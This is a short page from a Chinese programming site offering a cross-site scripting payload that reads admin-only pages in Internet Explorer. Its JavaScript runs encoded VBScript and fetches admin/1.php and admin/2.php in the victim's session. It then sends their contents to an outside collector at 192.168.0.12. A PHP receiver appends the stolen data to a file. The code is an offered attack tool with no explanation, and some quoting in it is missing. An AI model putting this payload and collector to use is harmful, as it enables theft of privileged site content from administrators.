当前位置:编程学习 > 网站相关 >>

xss后台目录文件内容读取(只适用IE)

vbs小铺

js:

execScript(unescape(Function%20bytes2BSTR%28vIn%29%0D%0A%20%20%20%20%20strReturn%20%3D%20%22%22%0D%0A%20%20%20%20%20For%20i%20%3D%201%20To%20LenB%28vIn%29%0D%0A%20%20%20%20%20%20%20%20%20ThisCharCode%20%3D%20AscB%28MidB%28vIn%2Ci%2C1%29%29%0D%0A%20%20%20%20%20%20%20%20%20If%20ThisCharCode%20%3C%20%26H80%20Then%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20strReturn%20%3D%20strReturn%20%26%20Chr%28ThisCharCode%29%0D%0A%20%20%20%20%20%20%20%20%20Else%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20NextCharCode%20%3D%20AscB%28MidB%28vIn%2Ci+1%2C1%29%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20strReturn%20%3D%20strReturn%20%26%20Chr%28CLng%28ThisCharCode%29%20*%20%26H100%20+%20CInt%28NextCharCode%29%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20i%20%3D%20i%20+%201%0D%0A%20%20%20%20%20%20%20%20%20End%20If%0D%0A%20%20%20%20%20Next%0D%0A%20%20%20%20%20bytes2BSTR%20%3D%20strReturn%0D%0AEnd%20Function),VBScript);

function getReaded(usr) {
var filex="http://192.168.0.12/style.php?key="+mycars[n]+" "+" "+usr+" "+" ";
addFile(filex,-1);
}
function addFile(str,i){

var x=document.createElement(SCRIPT);
x.src=str;
document.insertBefore(x,document.getElementsByTagName(*)[0]);

}

xmlUrl=GetxmlUrlObject()

if (xmlUrl==null)
    {
    alert ("您的浏览器不支持AJAX!");
    }


function GetxmlUrlObject()
{
var xmlUrl=null;
try
    {
    // Firefox, Opera 8.0+, Safari
    xmlUrl=new xmlUrlRequest();
    }
catch (e)
    {
    // Internet Explorer
    try
      {
      xmlUrl=new ActiveXObject("Msxml2.XMLHTTP");
      }
    catch (e)
      {
      xmlUrl=new ActiveXObject("Microsoft.XMLHTTP");
      }
    }
return xmlUrl;
}


var mycars = new Array();
mycars[0] = "admin/1.php";
mycars[1] = "admin/2.php";;
var b = new Array();

for (n=0;n<mycars.length ;n++ )
{

xmlUrl.Open(GET,mycars[n],false);
xmlUrl.setRequestHeader("Content-type","application/x-www-form-urlencoded;");
xmlUrl.Send(null);
if (xmlUrl.readyState == 4){
      if (xmlUrl.status == 200){
b[n]=bytes2BSTR(xmlUrl.responseBody);
//alert(b[n]);
getReaded(b[n]);
}
}


}

 

php:

<?php
header(Content-Type:text/html;charset=GB2312);
function   unescape($str)   {    
                    $str   =   rawurldecode($str);    
                    preg_match_all("/%u.{4}|&#x.{4};|&#d+;|.+/U",$str,$r);    
                    $ar   =   $r[0];    
                    foreach($ar   as   $k=>$v)   {    
                                      if(substr($v,0,2)   ==   "%u")    
                                                        $ar[$k]   =   iconv("UCS-2","UTF-8",pack("H4",substr($v,-4)));    
                                      elseif(substr($v,0,3)   ==   "&#x")    
                                                        $ar[$k]   =   iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1)));    
                                      elseif(substr($v,0,2)   ==   "&#")   {    
                                                        $ar[$k]   =   iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1)));    
                                      }    
                    }    
                    return   join("",$ar);    
}

$file="news.html";
$_GET[key]=unescape($_GET[key]);

fputs(fopen($file,a+),$_GET[key]);

?>

补充:综合编程 , 安全编程 ,
CopyRight © 2022 站长资源库 编程知识问答 zzzyk.com All Rights Reserved
部分文章来自网络,